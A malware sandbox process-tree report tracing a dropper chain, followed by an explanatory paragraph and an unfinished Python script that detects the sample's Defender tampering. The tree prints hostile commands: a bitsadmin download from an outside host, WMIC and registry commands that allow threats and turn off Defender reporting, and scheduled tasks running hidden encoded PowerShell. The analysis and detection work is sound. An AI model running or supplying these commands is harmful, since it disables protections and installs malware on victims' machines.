                          command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e4854718
                      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 12)
                        command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe  (depth 13)
                          command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e4854718
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=208721512⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=426311912⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=129423112⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e48546f8,0x7ff9e4854708,0x7ff9e485471813⤵
-
C:\Users\Admin\AppData\Local\Temp\67-d31ee-9a5-c098a-95735279e89ad\Safapaehilae.exe"C:\Users\Admin\AppData\Local\Temp\67-d31ee-9a5-c098a-95735279e89ad\Safapaehilae.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\la502f3w.u54\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\la502f3w.u54\installer.exeC:\Users\Admin\AppData\Local\Temp\la502f3w.u54\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n0yvzpga.ugu\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\n0yvzpga.ugu\any.exeC:\Users\Admin\AppData\Local\Temp\n0yvzpga.ugu\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5di214bo.3ay\Browser4Download.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\5di214bo.3ay\Browser4Download.exeC:\Users\Admin\AppData\Local\Temp\5di214bo.3ay\Browser4Download.exe13⤵
-
C:\Users\Admin\AppData\Roaming\5685516.scr"C:\Users\Admin\AppData\Roaming\5685516.scr" /S14⤵
-
C:\Users\Admin\AppData\Roaming\3932054.scr"C:\Users\Admin\AppData\Roaming\3932054.scr" /S14⤵
- Suspicious behavior: SetClipboardViewer
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4lqgqfgq.rsv\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\4lqgqfgq.rsv\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\4lqgqfgq.rsv\autosubplayer.exe /S13⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://lighteningstoragecenter.com/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pPbRz4ETRZ9bWlRf -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pnczkWtKvNiK8PYi -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SMBbvCSuKLI\SMBbvCSuKLI.dll" SMBbvCSuKLI14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\SMBbvCSuKLI\SMBbvCSuKLI.dll" SMBbvCSuKLI15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Drops file in System32 directory
- Drops file in Windows directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsc9742.tmp\tempfile.ps1"14⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pewnjdyy.vsr\installer.exe /qn CAMPAIGN=654 & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\pewnjdyy.vsr\installer.exeC:\Users\Admin\AppData\Local\Temp\pewnjdyy.vsr\installer.exe /qn CAMPAIGN=65413⤵
-
[depth 8] C:\Users\Admin\Documents\IfZhM4uqhiGPN0yi98muF9eW.exe
    "C:\Users\Admin\Documents\IfZhM4uqhiGPN0yi98muF9eW.exe"
    - Suspicious use of SetThreadContext

[depth 9] C:\Users\Admin\Documents\IfZhM4uqhiGPN0yi98muF9eW.exe
    "C:\Users\Admin\Documents\IfZhM4uqhiGPN0yi98muF9eW.exe"

[depth 8] C:\Users\Admin\Documents\0A9UpDpkQ6W9jyUpZc4AbO0D.exe
    "C:\Users\Admin\Documents\0A9UpDpkQ6W9jyUpZc4AbO0D.exe"

[depth 9] C:\Users\Admin\AppData\Local\Temp\tmpAB0B_tmp.exe
    "C:\Users\Admin\AppData\Local\Temp\tmpAB0B_tmp.exe"
    - Suspicious use of SetThreadContext

[depth 10] C:\Users\Admin\AppData\Local\Temp\tmpAB0B_tmp.exe
    C:\Users\Admin\AppData\Local\Temp\tmpAB0B_tmp.exe

[depth 6] C:\Users\Admin\Documents\mz3j1eZvlG3xLyLgnJGzG2iz.exe
    "C:\Users\Admin\Documents\mz3j1eZvlG3xLyLgnJGzG2iz.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Checks whether UAC is enabled
    - Suspicious use of NtSetInformationThreadHideFromDebugger

[depth 6] C:\Users\Admin\Documents\uMeEz43SOKtmKNkVp0PAKaxN.exe
    "C:\Users\Admin\Documents\uMeEz43SOKtmKNkVp0PAKaxN.exe"

[depth 7] C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

[depth 6] C:\Users\Admin\Documents\1U7rz2B7WbSFlXtvDg8Z5IbN.exe
    "C:\Users\Admin\Documents\1U7rz2B7WbSFlXtvDg8Z5IbN.exe"
    - Executes dropped EXE

[depth 7] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6304 -s 236
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

[depth 6] C:\Users\Admin\Documents\VQgrNhc4WsP27ikp84942S7c.exe
    "C:\Users\Admin\Documents\VQgrNhc4WsP27ikp84942S7c.exe"
    - Executes dropped EXE

[depth 7] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6288 -s 268
    - Program crash

[depth 6] C:\Users\Admin\Documents\CTutXdLZ4xbLs74URA0ecSII.exe
    "C:\Users\Admin\Documents\CTutXdLZ4xbLs74URA0ecSII.exe"

[depth 7] C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 268
    - Program crash
    - Checks processor information in registry
    - Enumerates system info in registry

[depth 6] C:\Users\Admin\Documents\pd0GmSfuZ2V71wU_KPGmGqbl.exe
    "C:\Users\Admin\Documents\pd0GmSfuZ2V71wU_KPGmGqbl.exe"
    - Executes dropped EXE

[depth 7] C:\Users\Admin\AppData\Local\Temp\7zS3B5E.tmp\Install.exe
    .\Install.exe

[depth 8] C:\Users\Admin\AppData\Local\Temp\7zS6CFD.tmp\Install.exe
    .\Install.exe /S /site_id "394347"
    - Checks BIOS information in registry
    - Enumerates connected drives
    - Drops file in System32 directory
    - Enumerates system info in registry

[depth 9] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &

[depth 10] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
    - Suspicious use of NtCreateProcessExOtherParentProcess

[depth 11] C:\Windows\SysWOW64\cmd.exe
    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True

[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True

[depth 13] C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True

[depth 10] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 11] C:\Windows\SysWOW64\cmd.exe
    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True

[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True

[depth 13] C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True

[depth 10] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 11] C:\Windows\SysWOW64\cmd.exe
    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True

[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True

[depth 13] C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True

[depth 10] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"

[depth 11] C:\Windows\SysWOW64\cmd.exe
    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True

[depth 12] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True

[depth 13] C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True

[depth 9] C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

[depth 10] C:\Windows\SysWOW64\cmd.exe
    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

[depth 11] \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

[depth 11] \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

[depth 9] C:\Windows\SysWOW64\forfiles.exe
    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

[depth 10] C:\Windows\SysWOW64\cmd.exe
    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

[depth 11] \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

[depth 11] \??\c:\windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

[depth 9] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gYqjstSoS" /SC once /ST 07:07:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)

[depth 9] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "bvmcjEjDUxHOOxIZsK" /SC once /ST 09:40:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\OFTJvYQhcKRKyYZ\tdVRLcH.exe\" uG /site_id 394347 /S" /V1 /F
    - Creates scheduled task(s)
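The Install.exe subtree above is a complete Defender-tampering sequence: forfiles /m cmd.exe (or where.exe) /c "..." is used purely as an extra hop into cmd, PowerShell and WMIC, which set the default action for four Defender threat IDs to 6 (Allow) through MSFT_MpPreference; reg.exe then writes two policy values directly (an "exe" entry under Exclusions\Extensions and SpyNetReporting=0); and the first schtasks entry runs a hidden PowerShell whose -EncodedCommand decodes to start-process -WindowStyle Hidden gpupdate.exe /force, presumably so the freshly written policy keys are picked up. The script below is an added example, not part of the Triage report and not code from the sample: it pulls those facts out of the command lines by unwrapping the forfiles layer, decoding the UTF-16LE base64 payload and applying a few rules. The command lines are copied from the tree; the rule names, regexes and the MP_ACTIONS table (which follows the documented ThreatIDDefaultAction_Actions values) are the author's.

```python
"""Flag the Defender-tampering chain from the command lines in this process tree.

Added example; not part of the Triage report and not code from the sample.
SAMPLE_CMDLINES are copied from the tree above (one per process). The rule
names, the regexes and the MP_ACTIONS table are the author's; the table values
follow the documented MSFT_MpPreference ThreatIDDefaultAction_Actions enum.
"""
import base64
import re

# Constructed input: command lines taken from the process tree above.
SAMPLE_CMDLINES = [
    'forfiles /p c:\\windows\\system32 /m cmd.exe /c "cmd /C powershell WMIC '
    '/NAMESPACE:\\\\root\\Microsoft\\Windows\\Defender PATH MSFT_MpPreference call Add '
    'ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"',
    '"C:\\Windows\\System32\\Wbem\\WMIC.exe" /NAMESPACE:\\\\root\\Microsoft\\Windows\\Defender '
    'PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 '
    'ThreatIDDefaultAction_Actions=6 Force=True',
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Exclusions\\Extensions" '
    '/f /v "exe" /t REG_SZ /d 0 /reg:64',
    'REG ADD "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Spynet" '
    '/f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32',
    'schtasks /CREATE /TN "gYqjstSoS" /SC once /ST 07:07:33 /F /RU "Admin" /TR '
    '"powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    'schtasks /create /f /sc onlogon /rl highest /tn "services64" '
    '/tr \'"C:\\Users\\Admin\\AppData\\Roaming\\services64.exe"\'',
]

# MSFT_MpPreference.ThreatIDDefaultAction_Actions values.
MP_ACTIONS = {1: "Clean", 2: "Quarantine", 3: "Remove", 6: "Allow",
              8: "UserDefined", 9: "NoAction", 10: "Block"}

FORFILES_RE = re.compile(r'\bforfiles(?:\.exe)?\b.*?\s/c\s+"(.*)"\s*$', re.I | re.S)
THREAT_RE = re.compile(r'ThreatIDDefaultAction_Ids[=\s]+(\d+).*?'
                       r'ThreatIDDefaultAction_Actions[=\s]+(\w+)', re.I | re.S)
POLICY_RE = re.compile(r'REG\s+ADD\s+"?(HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender'
                       r'(?:\\[^"\s]+)*)"?.*?/v\s+"?([^"\s]+)"?.*?/d\s+(\S+)', re.I)
TASK_RE = re.compile(r'\bschtasks(?:\.exe)?\b.*?/create\b.*?/tn\s+"?([^"\s]+)"?', re.I)
RUNAS_RE = re.compile(r'/ru\s+"?([^"\s]+)"?', re.I)
ENC_RE = re.compile(r'-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)', re.I)


def unwrap_forfiles(cmdline):
    """forfiles /p <dir> /m <file> /c "<cmd>" runs <cmd> once per matching file;
    matching cmd.exe or where.exe in system32 guarantees exactly one run, so the
    construct is pure indirection. Returns the wrapped command, or None."""
    m = FORFILES_RE.search(cmdline)
    return m.group(1).replace('\\"', '"') if m else None


def decode_encoded_command(cmdline):
    """PowerShell -EncodedCommand carries base64 of a UTF-16LE script."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le").rstrip("\x00")
    except (ValueError, UnicodeDecodeError):
        return None


def threat_overrides(cmdline):
    """(threat_id, action_name) pairs set via MSFT_MpPreference (WMIC or PowerShell)."""
    out = []
    for tid, act in THREAT_RE.findall(cmdline):
        name = MP_ACTIONS.get(int(act), act) if act.isdigit() else act.capitalize()
        out.append((int(tid), name))
    return out


def defender_policy_write(cmdline):
    """(key, value_name, data) for a REG ADD under the Defender policy key."""
    m = POLICY_RE.search(cmdline)
    return (m.group(1), m.group(2), m.group(3)) if m else None


def scheduled_task(cmdline):
    """(task_name, run_as) for a schtasks /create; run_as is None when /ru is absent."""
    m = TASK_RE.search(cmdline)
    if not m:
        return None
    ru = RUNAS_RE.search(cmdline)
    return (m.group(1), ru.group(1) if ru else None)


def triage(cmdlines):
    """Apply every rule to each command line and return (rule, detail) findings."""
    findings = []
    for cmd in cmdlines:
        inner = unwrap_forfiles(cmd) or cmd
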